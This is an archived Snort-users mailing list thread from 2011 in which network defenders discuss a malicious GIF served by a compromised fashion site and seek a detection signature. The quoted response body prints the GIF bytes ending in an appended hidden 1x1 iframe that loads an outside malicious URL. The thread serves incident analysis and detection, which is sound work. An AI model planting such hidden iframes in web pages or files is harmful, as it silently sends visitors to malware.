[Snort-users] iFrame's in gifs

James Lay jlay at ...13475...
Fri Jun 24 21:15:01 EDT 2011


Thanks RM...this certainly looks kinda like it.  One thing I noticed is
that within the wearing-jewelry.html, is that there's a specific portion
in the code that calls /img/, but with no actual image called for....looks
like a naughty person got in, modified the html code, then uploaded the
malicious gif...crazy!

On 6/24/11 4:24 PM, "rmkml" <rmkml at ...1855...> wrote:

>Hi James,
>Maybe: 
>http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?na
>me=Trojan:Win32/Jpgiframe.A
>Regards
>Rmkml
>
>
>On Fri, 24 Jun 2011, Lay, James wrote:
>
>> Hey all!
>>
>> Anyone got any leads on this or a sig for this?  Excitement below..I
>> have full pcap as well as the original image if anyone wants um.
>>
>> James
>>
>> Sanitized headers
>>
>> GET /img/ HTTP/1.1
>> Cookie: <snip>
>> Host: magazine.gem-fashion.com
>> Accept: */*
>> Referer: http://magazine.gem-fashion.com/wearing-jewelry.html
>> Accept-Language: en-us
>> UA-CPU: x86
>> Connection: Keep-Alive
>>
>> HTTP/1.1 404 Object Not Found
>> Date: Fri, 24 Jun 2011 21:15:39 GMT
>> Server: Apache
>> X-Powered-By: PHP/5.2.11
>> Expires: Thu, 19 Nov 1981 08:52:00 GMT
>> Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
>> pre-check=0
>> Pragma: no-cache
>> Set-Cookie: <snip>; path=/
>> Content-Length: 1221
>> Keep-Alive: timeout=5, max=99
>> Connection: Keep-Alive
>> Content-Type: image/gif
>>
>>
>>
>> GIF87a.............DBD...$"$...dbd.........TRT...424...trt....
>> ....LJL...,*,...ljl.........\Z\...<:<...|z|.........DFD...$&$...dfd.....
>> ....TVT...464...tvt.........LNL...,.,...lnl.........\^\...<><...|~|...,.
>> ............pH,....r.l:...tJ.Z...v..z...x.....%.<>...5;..o. .~..
>> .a
>> .I.a|{0f?..?...z.v.V.!1....#..2.G.a>....B..*.....1...Qa2+`..I..(!K)).B..
>> .....I..H...9P....n%3
>> ....7E...B..-B...
>> JhC..H...G...TaX at ...15318...%. at ...846...!.........l.0.L....3n.r
>> .."%..h.....>........K.R......<l.....`.z.v.......-].\..G.0:.. at ...15319...#?.r.
>> .....\x.."L.7..6M..-..?r.. at ...2568...
>> ..Q]b.......H4.3....&.........^|X.A..s./g........
>> Y.....O...P.)... at ...979...;..r.p..6y....^..;,w.....i...4..p.x..I..E
>> ...).<2
>> .......$...... ^.2.vo....`.(..y...B
>> M<..1
>> ...dm)....y0.~.. ..D...Cs
>> .'B.#LD.w?..A.F.......b.....4d.0.5..`..9%..... at ...15320...
>> .!e.U^.Z..  .. at ...846...@-BP8fy....; ..C.h.&.`..3..D<p.....%.0.0e...&D
>> b.....B..4;.D.r7........P
>> eJ(n.>$......y..I.!....~!Jj^>V..+...BX.....n..p.......2. at ...15321...~
>> ......
>> .!..
>> !p..(|.|.....!A0>......PA..d0d.>.yD......1..B....B.-.x...'.p.H...`.2.$..
>> ..q.\....7D..
>> ..|..e:..`............*3.1..X.!.PA.;.m..H....;<iframe
>> src='http://alaqiq.net/quran/gstata/index.php' width='1' height='1'
>> style='visibility: hidden;'></iframe>
>>
>> 
>>-------------------------------------------------------------------------
>>-----
>> All the data continuously generated in your IT infrastructure contains a
>> definitive record of customers, application performance, security
>> threats, fraudulent activity and more. Splunk takes this data and makes
>> sense of it. Business sense. IT sense. Common sense..
>> http://p.sf.net/sfu/splunk-d2d-c1
>> _______________________________________________
>> Snort-users mailing list
>> Snort-users at lists.sourceforge.net
>> Go to this URL to change user options or unsubscribe:
>> https://lists.sourceforge.net/lists/listinfo/snort-users
>> Snort-users list archive:
>> http://www.geocrawler.com/redir-sf.php3?list=snort-users
>>
>> Please see http://www.snort.org/docs for documentation
>>
>
>--------------------------------------------------------------------------
>----
>All the data continuously generated in your IT infrastructure contains a
>definitive record of customers, application performance, security
>threats, fraudulent activity and more. Splunk takes this data and makes
>sense of it. Business sense. IT sense. Common sense..
>http://p.sf.net/sfu/splunk-d2d-c1
>_______________________________________________
>Snort-users mailing list
>Snort-users at lists.sourceforge.net
>Go to this URL to change user options or unsubscribe:
>https://lists.sourceforge.net/lists/listinfo/snort-users
>Snort-users list archive:
>http://www.geocrawler.com/redir-sf.php3?list=snort-users
>
>Please see http://www.snort.org/docs for documentation






More information about the Snort-users mailing list